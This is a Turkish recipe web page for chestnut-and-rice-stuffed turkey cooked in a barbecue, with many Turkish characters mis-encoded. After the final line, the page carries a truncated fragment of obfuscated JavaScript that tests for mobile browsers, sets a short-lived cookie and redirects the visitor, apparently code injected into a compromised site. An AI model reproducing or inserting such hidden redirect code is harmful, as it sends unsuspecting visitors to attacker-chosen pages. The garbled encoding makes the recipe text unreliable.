Kestaneli Hindi

Kestaneli Hindi

YA�lbaAYA� akAYamA�na az kaldA�. YA�lbaAYA� menA?sA?nde hindi klasiAYinden vazgeA�meyenler, hindiyi barbekA?de piAYirmeye ne dersiniz? Azimdi size vereceAYimiz tarif ile yA�lbaAYA� akAYamA� leziz mi leziz, nar gibi kA�zarmA�AY hindinizi misafirlerinize ikram edebilirsiniz.

Malzemeler:
– 1 adet orta boy bA?tA?n hindi (tercihe gA�re 1 adet bA?tA?n tavuk)
– A�A� pilav iA�in:
– 1,5 yemek kaAYA�AYA� dolmalA�k fA�stA�k
– 4 yemek kaAYA�AYA� tereyaAYA�
– 1 su bardaAYA� bardaAYA� zeytinyaAYA�
– 1 baAY dereotu a�� ince kA�yA�lmA�AY
– 3 su bardaAYA� A�nceden suda A�slatA�lmA�AY ve 30 dakika bekletilip sA?zA?lmA?AY baldo pirinA�
– 2 su bardaAYA� fA�rA�nlanmA�AY ve soyulmuAY kestane
– 1 A�ay bardaAYA� kuAY A?zA?mA?
– Tuz

HazA�rlanA�AYA�:
– Tencerede dolmalA�k fA�stA�k, tereyaAYA� ve zeytinyaAYA�nA� birlikte soteleyin.
– A?zerine pirinA� ekleyip 2-3 dakika sotelendikten sonra suyunu ekleyin.
– PilavA�n suyunun A�ekilmesine yakA�n A?zA?m, kestane ve dereotunu ekleyin.
– Hindiyi hazA�rlanan iA� pilav ile doldurun.
– Hindinin arka ayaklarA�ndan kA?rdan veya tahta AYiAY ile baAYlayA�n.
– AlA?minyum folyo ile sarA�lan hindi (veya tavuk) A�nceden hazA�rlanmA�AY Aniva Cosa Barbecuea��ya koyulur. FA�rA�n kapaAYA� da kapatA�ldA�ktan sonra ateAYi ve hindiyi ara ara kontrol ederek yaklaAYA�k olarak 3 saat piAYirin.
– Aniva Cosa Barbecuea��dan A�A�kardA�ktan sonra folyoyu A�A�kar ve 15 dakika beklettikten sonra kesip, servise hazA�r edin.
– Afiyet olsun! |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply